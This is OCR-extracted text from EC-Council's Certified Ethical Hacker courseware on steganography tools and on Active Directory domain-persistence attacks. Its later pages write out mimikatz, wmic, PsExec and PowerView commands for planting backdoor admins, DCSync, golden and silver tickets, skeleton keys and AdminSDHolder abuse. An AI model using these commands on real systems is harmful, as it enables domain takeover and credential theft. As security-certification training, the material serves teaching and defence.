Source: https://www.openstego.com OpenStego is a steganography application that provides the following functions. o

Data Hiding: It can hide any data within a cover file (e.g., images)

o

Watermarking: Watermarking files (e.g., images) with an invisible signature. It can be used to detect unauthorized file copying. & Openstego

Eile Help

Data Hiding Hide Data “

Extract Data Digital Watermarking (Beta) & Generate Signature

-

C:\Users \Administrator \Desktop Document. txt

Ccover File

(elect muttiole files or provide wildcard (*, 2) to embed same message in multiple files) C:\Users Administrator \Desktop \bike. jog

Output Stego Fle C:\Users Administrator Desktop \output_file.bmp Options

Encryption Algorithm

fa

Password

Verify Watermark

x

Hide data in harmless looking files MessageFile

&

Embed Watermark

oO

reeie Eeeesmen

‘AES128

v

eeecceee

eovcecee| Hide Data

Figure 6.167: Screenshot of OpenStego

Some examples of image steganography tools are as follows:

=

StegOnline (https://stegonline.georgeom.net)

=

Coagula (https://www.abc.se)

=

QuickStego (http://quickcrypto.com)

=

SSuite Picsel (https://www.ssuitesoft.com)

=

CryptaPix (https://www. briggsoft.com)

Module 06 Page 851

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Document Steganography Document steganography is the technique of hiding secret messages transferred in the form of documents. It includes the addition of whitespaces and tabs at the ends of lines. A stegodocument is a cover document comprising the hidden message. Steganography algorithms, referred to as the “stego system,” are employed to hide the secret messages in the cover medium at the sender end. The same algorithm is used by the recipient to extract the hidden message from the stego-document. The following diagram illustrates the document steganography process:

«0

Document Files

“ee aS

Steg Tool

Information

_a

2. 3

Document Files

as

Steg Tool

Information

Figure 6.168: Document steganography process

Document Steganography Tools Document steganography tools help in hiding files within documents, such as text or html files, using steganography methods. =

StegoStick

Source: https://sourceforge.net StegoStick is a steganographic tool that allows attackers to hide any file in any other file. It is based on image, audio, or video steganography, which hides any file or message in an image (BMP, JPG, GIF, etc.), audio/video (MPG, WAV, etc.), or any other file format

(PDF, EXE, CHM, etc.).

[@ stegostick

-

x

StegoStick Readme Hiding UnHiding Help License

“et Secret File (C:\Users\Admnistrator Desktop\Secret text. txt

browse

Cover File Cco\sers\Adminstrator Desktop sland. jog

bronse

Destinatios (C:\Users\Adrinstrator Desktop Enter Password

~

browse sevens

C=

Figure 6.169: Screenshot of StegoStick

Module 06 Page 852

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Some examples of document steganography tools are listed as follows:

=

Steg) (http://stegj.sourceforge.net)

=

Office XML (https://www.irongeek.com)

=

SNOW (http://www.darkside.com.au)

=

Data Stash (https://www.skyjuicesoftware.com)

=

Texto (http://www.eberl.net)

Video Steganography The image steganography discussed earlier can only hide a small amount of data inside image carrier files. Thus, image steganography can only be used when small amounts of data are to be hidden in the image files. However, one can use video steganography when it is necessary to hide large amounts of data inside carrier files. Video video .WMV, of the

steganography is a technique to hide any kind of file with any extension in a carrying file. The information is hidden in video files of different formats, such as .AVI, .MPG4, etc. Discrete cosine transform (DCT) manipulation is used to add secret data at the time transformation process of the video.

Video files carry the secret information from one end to another. This ensures greater security of your secret information. Numerous secret messages can be hidden in video files as every frame consists of both images and sound. As the carrier video file is a moving stream of images and sound, it is difficult for the unintended recipient to notice the distortion in the video file caused due to the secret message, and therefore, the message might go unobserved because of the continuous flow of the video. You can apply all the techniques available for image and audio steganography to video steganography. The information hidden in video files is nearly impossible to be recognized by the human eye, as the change in pixel color is also negligible. The following tools facilitate the hiding of secret information steganography: =

in running videos using video

OmniHide Pro Source: https://omnihide.com OmniHide

PRO

allows

you

to

hide

any

secret file within

an

innocuous

image,

video,

music file, etc. The user can use or share the resultant stego file like a normal file without anyone knowing the hidden content; thus, this tool enables you to save your secret file from prying eyes. It also enables you to add a password to hide your file and enhance security.

Module 06 Page 853

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

(@ OmnitidePro Trial v1.0

x

Hide

Hide your data from those

prying

Omni Hide! Recover Settings GoPro! About

Mack File

_[C\Users\AdministratorDesktoplslandpg

®

File To hide

C:\Users\AdministratorDownloadsifile_example_AVI

Output File

C:\Users\Administrator Desktop\isiand_Out jpg

(=)

1 View converted file when complete

2

on ®

m0

Ready.

Figure 6.170: Screenshot of OmniHide PRO Some examples of video steganography tools are as follows: =

RT Steganography (https://rtstegvideo.sourceforge.net)

=

StegoStick (https://sourceforge.net)

=

OpenPuff (https://embeddedsw.net)

=

MSU StegoVideo (http://www.compression.ru)

Audio Steganography In audio steganography, the user embeds the hidden messages in a digital sound format. Audio steganography allows you to conceal secret message within an audio file such as a WAV, AU, or even MP3 audio file. It embeds secret messages in audio files by slightly changing the binary sequence of the audio file. Changes in the audio file after insertion are not easily detectable, and in this way, the secret messages can be secured from prying ears. The carrier audio file should not be allowed to be distorted to avoid detection of hidden messages. Therefore, one should embed the secret data in such a way that a slight change in the audio file can go unnoticed upon listening. One can hide information in an audio file by replacing the LSB or by using frequencies that are not audible to the human ear (>20,000 Hz).

Module 06 Page 854

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

e

Audio File a.

tt .

.

“pr

Steg Tool

ts ron .

Stego Object

stog Too

Information

a

Information Figure 6.171: Audio steganography process

Audio Steganography Methods There are certain methods available to conceal your secret messages in audio files. Some methods implement an algorithm that relies on inserting the secret information in the form of a noise signal, while other methods believe in exploiting sophisticated signal-processing techniques to hide information. The following methods can be used to perform audio steganography to hide information: =

Echo Data Hiding In the echo data hiding method, you can embed the secret information in the carrier audio signal by introducing an echo into it. Three parameters of echo are used, namely initial amplitude, decay rate, and offset or delay, to hide the secret data. When the offset between the carrier signal and echo decreases, they combine at a certain point of time at which the human ear cannot distinguish between the two signals. At this point, you can hear an echo as an added resonance to the original signal. However, this point of indistinguishable sounds depends on factors such as quality of the original audio signal, type of sound, and listener acuity. To encode the resultant signal into binary form, two different delay times are used. These delay times should be below the level of human perception. Parameters such as decay rate and initial amplitude should also be set below threshold audible values so that the audio cannot be heard.

=

Spread Spectrum Method This method uses two versions of the spread spectrum: direct-sequence spectrum (DSSS) and frequency-hopping spread spectrum (FHSS).

spread

o

Direct-Sequence Spread Spectrum (DSSS): DSSS is a frequency modulation technique where a communication device spreads a signal of low bandwidth over a broad frequency range to enable the sharing of a single channel between multiple users. The DSSS steganography technique transposes the secret messages in radio wave frequencies. DSSS does introduce some random noise to the signal.

©

Frequency-Hopping Spread Spectrum (FHSS): In FHSS, the user alters the audio file’s frequency spectrum so that it hops rapidly between frequencies. The spread spectrum method plays a significant role in secure communications, both commercial and military.

Module 06 Page 855

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

LSB Coding LSB encoding works similarly to the LSB insertion technique, in which users can insert a secret binary message in the least significant bit of each sampling point of the audio signal. This method allows one to hide enormous amounts of secret data. It is possible to use the last two significant bits to insert secret binary data, but at the risk of creating noise in the audio file. Its poor immunity to manipulation makes this method less adaptive. You can easily identify extra hidden data because of channel noise and resampling. Tone Insertion

This method involves embedding data in the audio signal by inserting low-power tones. These tones are not audible in the presence of significantly higher-power audio signals, and therefore the presence of the secret message is concealed. It is exceedingly difficult for an eavesdropper to detect the secret message from the audio signal. This method helps to avoid attacks such as low-pass filtering and bit truncation. The audio steganography software implements one of these audio steganography methods to embed the secret data in the audio files. Phase Encoding Phase coding is described as the phase in which an initial audio segment is substituted by a reference phase that represents the data. It encodes the secret message bits as phase shifts in the phase spectrum of a digital signal, achieving a soft encoding in terms of the signal-to-noise ratio.

Module 06 Page 856

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

Audio Steganography Tools There are many tools available on the market that can help to hide secret information in an audio file. The following are some examples of audio steganography tools to hide secret information in audio files: =

DeepSound

Source: http://jpinsoft.net DeepSound allows you to hide any secret data in audio files (WAV and FLAC). It also allows you to extract secret files directly from audio CD tracks. In addition, it can encrypt secret files, thereby enhancing security. DeepSound

-

2.0

*

,

Hide Data Inside Audio

éoe

Fd

Audio Converter

re)

Settings

+

Open carrier files

aa

Add secret files

Encode secret files

|

o

x

@

Help

Extract secret files

| Carrier audio files ;

© @ Q

= areape rurciiac

File

Dir

D:\Audio D:\Audio

D:\Audio

wmawma

Size (MB)

22.4 MB 25.9 MB 214 MB

Secret files in D:\Audio\WMA.wma:

Output audio file quality

© Low @ Normal

© High

Free space for secret files: 7.8MB

(emmy

&

_DasecretFiles\secretFilel pdf

3.4 MB

G

DA SecretFiles\SecretFile2.doc

0.2 MB

&

—_Da\secretFiles\secretFile3,jpg

Hiding File 1 Fle / Folder / Dove ust

é@

External Disk

© Shared Folder

3

More Tools

Figure 6.173: Screenshot of GiliSoft File Lock Pro

Some examples of folder steganography tools are listed as follows:

=

Folder Lock (https://www.newsoftwares.net)

=

Hide Folders 5 (https://fspro.net)

=

InvisibleSecrets (https://www.east-tec.com)

=

QuickCrypto (http://www.quickcrypto.com)

Module 06 Page 858

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

Spam/Email Steganography Spam/email steganography refers to the technique of sending secret messages by embedding them and hiding the embedded data in spam emails. Various military agencies supposedly use this technique with the help of steganography algorithms. You can use the Spam Mimic tool to hide a secret message in an email. Spam/Email Steganography Tool =

Spam Mimic

Source: https://www.spammimic.com Spam Mimic is spam “grammar” for a mimic engine by Peter Wayner. This encodes secret messages into innocent-looking spam emails. The encoder of this tool encodes the secret message as spam with a password, fake PGP, fake Russian, and space.

@ spammimic- encode €

©

>

x

+

viele ve

e shtml @ spammimiccom/encod

jimnic Encode

Decode Explanation

Credits

FAQ & Feedback

Terms Francais

HOW

DOES

CONTROL

og.

MMiimiag)

x

Gey

MAT HOW

Encode

Enter your short secret message: 12345678910

Encode

Alternate encodings:

* * * * *

Encode Encode Encode Encode Encode

as as as as as

spam with a password fake spreadsheetmaw fake PGP fake Russian space

Figure 6.174: Screenshot of Spam Mimic showing encoded process

Module 06 Page 859

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures ‘System Hacking

@ spommimic- encoded C



Exam 312-50 Certified Ethical Hacker

x

+

@ spammimic.com/encode.cgi

Encoded

Decode

Your message 12345678910 gets encoded into spam as:

Erisaien

Credits Geta

Feedback

Dear Colleague , Thank-you for your interest in our

newsletter ! If you no longer wish to receive our publications

ev

oe

WATCH NOW

CONTRO!

Encode

@

Led

HOW DOES

finnic

ys

.

Mail it

simply reply with a Subject: of "REMOVE" and you will

(Zap this message into your

Title being sent in compliance with Senate bill 2516

but it won't be sent until

mailer

immediately be removed from our club . This mail is

17 ; Section 306 . Do NOT confuse us with Internet scam

you click on Send)

or

oo

lartists ! Why work for somebody else when you can become

Francais

ido almost anything to avoid mailing their bills & nobody

‘You can copy the message

capitalize on this . WE will help YOU SELL MORE and

nD

ich in 30 DAYS . Have you ever noticed people will

is getting any younger . Well, now is your chance to

SELL MORE. You are guaranteed to succeed because we

lake all the risk. But don't believe us . MrJones

ECrG SD

CRO

Te

Otero)

cael

CTEES

of Florida tried us and says "Now I'm rich many more

o Rear

standing . Because the Internet operates on “Internet

# How to copy and paste aes a pant

things are possible” ! We are a BBB member in good

itime” you must hurry . Sign up a friend and you'll

get a discount of 10% ! Thank-you for your serious consideration of our offer !

aero

Figure 6.175: Screenshot of Spam Mimic showing encoded output

Other Types of Steganography =

Web Steganography: In web steganography, objects and uploads them to a web server.

=

DVD-ROM Steganography: In DVD-ROM steganography, the user embeds the content in audio and graphical data.

=

Natural Text Steganography: Natural text steganography is the process of converting sensitive information into user-definable free speech such as a play.

=

Hidden OS Steganography: Hidden OS steganography is the process of hiding one OS in another.

=

C++ Source-Code Steganography: set of tools in the files.

Module 06 Page 860

a user hides web

objects behind

other

In C++ source-code steganography, the user hides a

Ethical Hacking and Countermeasures Copyright © by EC-Cout

All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Steganography Tools for Mobile Phones Earlier, we discussed a wide range of applications/tools that can messages in various types of carrier media, such as images, audio, run on a variety of platforms of desktops or laptops only. However, apps available that act as steganography tools for mobile phones. apps to send their secret messages.

be useful in hiding secret video, and text. These tools there are also many mobile Mobile users can use these

Some steganography tools that run on mobile devices as follows:

.

Stegais

Source: https://play.google.com Stegais can hide a message taken by the camera.

in a selected image from the photo

library or in a photo

Stegais

Welcome to

STEGAIS

our steganography software for now. You can choose what type of message you want to hide inside image: Voice

Or you can go to reveal the message from your image:

Reveal the Message

For information about image choose: Image Analysis

Please read important inf formation about

|

*

www 4

Domain

Legitimate User

Controller a

ii Golden Ticket/ Silver Ticket

DPAPI

Skeleton Key

Figure 6.179: Illustration of a domain dominance attack

Listed below are the various techniques used by attackers to maintain domain dominance:

=

Remote code execution

=

Abusing the Data Protection API (DPAPI)

=

Malicious replication

=

Skeleton key attack

=

Golden ticket attack

=

Silver ticket attack

Module 06 Page 873

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

Remote Code Execution and Abusing DPAPI Remote Code Execution

CEH

Abusing DPAPI

|@ Attackers attempt to execute malicious code

on the target domain controller through CLI to launch a domain dominance attack

‘@_

The Windows domain controllers contain a master

@

Attackers attemptto obtain this master key from

key to decrypt DPAPI-protected files

the domain controller

Remote Code Execution Attackers attempt to execute malicious code on the target domain controller (DC) through CLI to launch a domain dominance attack. Using this technique, attackers hold persistence to perform malicious activities over time without being detected. Attackers follow the steps execution. =

below to perform

dominance

Create

a dummy process and user on the target DC using WMI:

wmic

/node:

/add

PiratedProcess

Du**Y01"

Here, PiratedProcess and Du*“y01 dummy process on the target user’s DC.

=

a domain

process

attack via remote

call

create

are the user ID and password

"net

code

user

of the planted

Once the user is created, add the user to the “Admins” group. PsExec.exe

"Admins"

\\


PiratedProcess

/add

-accepteula

net

localgroup

=

Navigate to Active Directory Users and Computers (ADUC) and identify the user created using the above command.

=

Open the properties window on the system and navigate to the “Member of” tab to verify the membership.

Module 06 Page 874

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

4

x

Securty Environment Sessions Remote control Remote Desktop Services Profile COM+ Attribute Editor General Address Profle Telephones Organization Published Certficates Password Replication Dialin Object Memberof Name

Domain Users

Add...

Primary group:

Active Directory Domain Services Folder

CEH.com/Users

Remove

Domain Users There is no need to change Primary group unless you have Macintosh clients or POSIX-compliant

applications

Figure 6.180: Screenshot showing InsertedUser Properties

After successfully adding a new user to the “Admins” credentials to hold persistence on the target DC.

group,

the

attacker

uses these

Abusing Data Protection API (DPAPI) DPAPI is a unified location in Windows environments where all the cryptographically secured files, passwords of browsers, and other critical data are stored. Windows domain controllers (DCs) contain a master key to decrypt DPAPI-protected files. Attackers often attempt to obtain this master key from the DC using any of the following methods. =

Run the following mimikatz command to recover the master key using the password of a compromised user: dpapi: :masterkey /in:"C:\Users\spotless .OFFENSE\AppData\Roaming\Microsoft\Protect\ S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-£901-40a1-

b691-84d7£647b8fe" /sid:S-1-5-21-2552734371-813931464-10506908071106 /password:******* /protected

Module 06 Page 875

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking =

Run the following command credentials: sekurlsa:

=

Exam 312-50 Certified Ethical Hacker to retrieve all local master keys with compromised admin

:dpapi

Run the following command to retrieve all backup master keys: lsadump:

:backupkeys

/system:dc01.offense.local

/export

Figure 6.181: Screenshot showing the output of the mimikatz tool Cross-check whether the secured master keys are obtained by navigating through the root location containing the mimikatz.exe file and check for file formats such as .der, .key, pvk., and -pfx. By obtaining a master key, the attacker can open any DPAPI-encrypted file from any device associated with the network and maintain persistence.

Module 06 Page 876

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Malicious Replication and Skeleton Key Attack Malicious Replication @

@

Itenables attackers to create an exact copy of user data using the admin credentials

Attackers often attempt to replicate sensitive accounts such as “krbtgt”

ig iE H

Skeleton Key Attack ‘@

Asskeleton key is a form of malware that attackers use to inject false credentials into domain controllers to create a

backdoor password

@ Itis amemory-resident virus that enablesan attacker to obtain a master passwordto validate themselves as a legitimate user in the domain

Copyright © by

Al Rights Reserved Reproduction i

Malicious Replication Malicious replication enables attackers to create an exact copy of user data using the admin credentials. This technique allows attackers to compromise other credentials and access accounts from a remote location. Attackers follow all the DCSync attack steps to replicate sensitive accounts such as “krbtgt,” which serves as a master key for signing Kerberos tickets. Attackers attempt malicious replication using the following command: Invoke-Mimikatz -command '"lsadump::dcsync /aser:\"

Module 06 Page 877

/domain:

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Figure 6.182: Screenshot showing the output of the mimikatz tool The above command generates NTML hashes of the given domain user.

Skeleton Key Attack A skeleton controllers attacker to This attack distinguish

key is a form of malware that attackers use to inject false credentials into domain (DCs) to create a backdoor password. It is a memory-resident virus that enables an obtain a master password to validate themselves as a legitimate user in the domain. necessitates domain administrator rights and DC access. This attack is difficult to from other standard user authentication methods, making it difficult to detect.

veseword

Installs malware to create backdoor and retrieves master

Domain Controller gives admin rights and master

=» “\p

password to the attacker

Domain Controller

Attacker

Figure 6.183: Illustration of a skeleton key attack

Module 06 Page 878

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Working of the Skeleton Key Attack This attack is straightforward and only requires the execution of misc: : skeleton on each DC using the following command: Invoke-Mimikatz -Command '"privilege::debug"

"misc::skeleton"'

-

Figure 6.184: Screenshot of mimikatz After executing the above command, the attacker can masquerade as any user with the default mimikatz credentials. Attackers also perform skeleton key attacks by patching the Local Security Authority Server Service (LSASS). Attackers leverage their access to the domain and install malware on the DCs. The malware auto-patches the LSASS, which produces a new skeleton key or master password that works for all the users. The error shown in the above screenshot is displayed if LSASS has already been patched with skeleton keys. Attackers can alternatively utilize the Empire tool, which contains a module that automates the process by running mimikatz entirely in memory and avoiding the binary from being dropped on the DC. powershell/persistence/misc/skeleton_key

nKey

misc/skeleton_key

misc ‘mimi

I

implant a PPLI ON

DOMAIN CONTROLLERS!

d

Figure 6.185: Screenshot showing the Empire skeleton key module Module 06 Page 879

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Here, running the execute command triggers the skeleton key attack. )

ted: Hostname: 685307

> execute

M732D8

WIN-PTELU2UO7KG. p

‘.mb.local

/ S-1-5-21-3737340914-20195942552413)

Figure 6.186: Screenshot showing the execution of a skeleton key attack in Empire

Module 06 Page 880

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Golden Ticket Attack

CE H

@ A golden ticket attack is a post-exploitation technique implemented by attackers to gain

complete control over the entire Active Directory (AD)

(@ Attackers forge Ticket Granting Tickets (TGTs) by

compromising a Key Distribution Service account (KRBTGT) to access various AD resources Domain Controller / Koc

& or

Aeicknr accesses scenes

Gathers the domain name and Qo sioand then impersonates the privileged user

XO)

Application Server

Golden Ticket Attack A golden ticket attack is a post-exploitation technique implemented by attackers to gain complete control over the entire AD. Attackers perform this attack by leveraging the Kerberos authentication protocol, using which they forge Ticket Granting Tickets (TGTs) by compromising a Key Distribution Service account (KRBTGT) to access various resources. This attack allows attackers to maintain persistence and obtain more information within the AD by masquerading as privileged users.

Sends a forged TGS request

a ceceeeeneecneteceentecteneeeanensueceaeeuseanaeaD TGS response

e

Domain Controller /

©

KDC

Gathers the

domain name and SID and then

Attacker accesses resources as a legitimate user

seeeeeeeeeees

weneeceeeeeeeeeeeesD Application Server

impersonates the

privileged user

Forges aTGS

ticket!

Figure 6.187: Illustration of a golden ticket attack

Module 06 Page 881

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Working of a Golden Ticket Attack Attackers initially compromise a valid user account either using phishing emails or by exploiting vulnerabilities or security misconfigurations. The steps involved in a golden ticket attack are as follows. 1.

Attackers obtain domain information such as the domain identifier (SID) using the whoami command.

2.

Then, attackers elevate their privileges to the domain’s administrator-level user account to steal the NTLM hash of KRBTGT. Attackers use mimikatz to perform a pass-the-hash attack or DCSync attack to steal KRBTGT’s password hash by executing the following command: lsadump::dcsync

3.

/domain:domain

name

name

and domain

security

/user:krbtgt

After obtaining the password hashes, attackers run the following mimikatz command to obtain a golden ticket by impersonating an administrator-level user. It allows the

attackers to access any resource, group, or domain in the environment. kerberos::golden /domain:domain value /id:value /user:username

name

/sid:SID

/rc4:KRBTGT

hash

Finally, attackers maintain persistence by setting the validity of the ticket.

Figure 6.188: Screenshot of mimikatz

Figure 6.189: Screenshot showing saved Kerberos tickets

Note: The final step can also be executed replication process.

Module 06 Page 882

by the NTLM

hashes obtained

from

a malicious

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking

Silver Ticket Attack 01

|

Asilver ticket attack is a post-exploitation technique implemented by _anattacker to steal legitimate users’ credentials and create a fake

Kerberos Ticket Granting Service (TGS) ticket

02

TWintiate this attack, the attacker must have access to the credentials gathered from a local service account or the system's SAM database

03

Theattacker creates a forged Kerberos TGS ticket using the mimikatz tool to establish a connection with the target service Extracts the service account's NTLM hashes ‘Compro ed Machine

Gathers the domain @ pameand siv and then impersonates the privileged user ~artacker

‘Accesses resource asa legitimate user

Local Server

Q ceterstoes

Silver Ticket Attack A silver ticket attack is a post-exploitation technique implemented by an attacker to steal legitimate users’ credentials and create a fake Kerberos Ticket Granting Service (TGS) ticket. This attack allows an attacker to acquire permissions to only a single service in an application, unlike the golden ticket attack, in which the attackers acquire permissions over the entire AD. To initiate a silver ticket attack, the attacker must hold access to the credentials gathered from a local service account or the system’s SAM database. Then, the attacker forges or creates a silver ticket without any intermediary such as a domain controller (DC), which makes it easier for the attacker to intrude and become untraceable for monitoring solutions. The attacker initially compromises the target system through techniques such as phishing and vulnerability exploitation. On gaining access to a networked system, the attacker initiates the silver ticket attack by creating a false Kerberos silver ticket using the following steps:

=

The attacker obtains domain information such as the domain name and domain security identifier (SID) using the whoami command.

=

The attacker obtains other details of the service or service type they wish to target.

=

The attacker deploys password cracking tools such as mimikatz on the compromised system to extract the Kerberos service’s local NTLM password hash.

=

The attacker initiates offline password attacks such as Kerberoasting to obtain a raw or plaintext password for the service.

=

The attacker creates a forged or fake Kerberos TGS ticket using the mimikatz tool to establish a connection with the target service.

=

The attacker uses both the forged TGS and hash data to authenticate the local service as a legitimate user.

Module 06 Page 883

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

‘System Hacking =

The attacker exploits TGS to elevate privileges and permissions.

Note: Privilege Attribute Certificate (PAC) validation request and PAC validation response are optional in a silver ticket attack.

Extracts the ser Compromised

Machine

Forged TGS + NTLM Gathers the domain name and SID and

then impersonates @ & |

Accesses resource as a legitimate user

| E Local Server

the privileged user ~ attacker Creates forged TGS ticket

Figure 6.190: Illustration of a silver ticket attack

If an attacker can successfully elevate privileges and obtain admin rights to execute code on a local machine, they can run the following command to retrieve the NTLM hashes of the AD system’s password:

mimikatz “privilege::debug” “sekurlsa::logonpasswords”

Figure 6.191: Screenshot of the mimikatz tool displaying the compromised system’s credentials

Module 06 Page 884

Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Maintain Domain Persistence Through AdminSDHolder @

cE

AdminsDHolder is an object of Active Directory that protects user accounts and groups having high privileges against

accidental modifications of security permissions

@

Attackers having admin privileges ona compromised domain can abuse the SDProp process to establish persistence

‘@

Attackers can add a user account to the ACL

to gain “GenericAll” privileges, equivalent to the privileges of the domain administrator

Copyright © by

Al Rights Reserved. Reproduction is

Maintain Domain Persistence Through AdminSDHolder AdminSDHolder is an object of AD that protects user accounts and groups having high privileges against accidental modifications of security permissions. Frequently, the Security Descriptor Propagator (SDProp) process retrieves the access-control list (ACL) of AdminSDHolder that contains the default permissions for the accounts and groups. These default permissions are compared with the permissions of the highly privileged accounts to identify modifications and then overwritten with those defined in the ACL. Attackers having admin privileges on a compromised domain can abuse the SDProp process to establish persistence. Attackers can add a user account to the ACL to gain “GenericAll” privileges, equivalent to the domain administrator. Consequently, with the changes replicated every hour by SDProp, attackers can maintain persistence.

Establishing Domain Persistence by Abusing AdminSDHolder Use the following command to add a user account Martin to the ACL: Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' PrincipalSamAccountName Martin -Verbose -Rights All

Module 06 Page 885

-

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

al Help (c) Microsoft Corporation. All rights reserved

Users\Administ lcd C:\Windows\Syster

wnt

findows\System32

Wind

powershell Windows Powe copyright (C) Install

the

Microsoft Corporation.

ALl rights reserved

latest PowerShell for new features

and improvements! https

Windows\System32> cd C:\Users\Administrator Users’ nistrator ers\Administrator> cd C:\Users\Administrator\Downloads\PowerView Administ rator\Downloads\Power Administrator\Downloads\Power [Import-Module_./powerview.psm. Administrat Get-DomainSearcher search str DAP inSDHolder ,C Get-DomainSearcher search string: LDAP: //DC=CEH,D Granting principal S-1-5-21-2083413944-2693254119-1471166842-1104 AdminSDHolder , CNH, DC=com VERBOSE: Granting principal S-1-5-21-2083413944-2693254119-1471166842-1194 lpeoa00a0000 nSDHolder , CN=Syste Users\Administrator\Download

EH,D ‘ALL’

on

‘0000000 -000-0000-0000-6)

Figure 6.192: Screenshot of PowerShell showing the addition of a user account

The SDProp process retrieves the ACL to check whether the Martin account has “GenericAll” permissions: Get-ObjectAcl

-SamAccountName

"Martin”

-ResolveGUIDs

e le Edit Vie pove0000000 rights on CN=AdminSDHolder , CN=System,DC=CEH , DC=c PS C:\Users\Administrator\Downloads\Pow et-ObjectAcl -SamAccountName "Martin CN IidentityReference Inherited ActiveDirectoryRights Propagat ionFlags objectFlag ItnheritanceF lags ItnheritanceType AccessCont rol Type lobjectSID

ItnheritedObjectTyt fobjectoN Inherited lActiveDirectoryRights PropagationFlags objectFlags IinheritanceFlags ItnheritanceType lAccessControlType

NT AUTHORITY\SELF Fals : GenericRead None None None None Allow S-1-5-21-2083413944-2693254119- 147116

AU CN=Martin ers ,DC=CEH, DC ALL NT AUTHORITY\Authenticated Users Fals dcontro None None None

Figure 6.193: Screenshot of PowerShell showing GenericAlll privileges Module 06 Page 886

‘al Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Cou ntermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Additionally, the following command can be used to change the default time of SDProp to 3 min by modifying the registry: HKLM\SYSTEM\CurrentControlSet\Services\NTDS\ Parameters AdminSDProtectFrequency /T REG DWORD /F /D 300

REG

ADD

/v

Figure 6.194: Screenshot of PowerShell showing the modification of the registry The screenshot shows that the Martin permissions set.

account has been added to AdminSDHolder with all

AdminSDHolder Properties

2.

xX

General Object Securty Attrbute Editor or user names: Everyone

a

$82, Domain Admins (CEH\Domain Admins)

v

8 SELF 82 Authenticated Users SR SYSTEM

Bermissionsfor Martin J Fall control Read Write Create all child objects Delete all child objects For special pemmissions or advanced settings, click

Advanced

OK

Remove

oooooly

Add

fous

Cancel

Figure 6.195: Screenshot of AD users and computers in AdminSDHolder properties Module 06 Page 887

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Add the account Martin to the group Domain net

group

“Domain

Admins”

Martin

cessControlType lobjectSID

IdentityReference

/add

/domain

}944-2693254119- 1471161 A

InheritedObjectType

lobjecton object Type

Admins using the following command:

i

A

s,

DC=CEH, DC

BUILTIN\Administrator

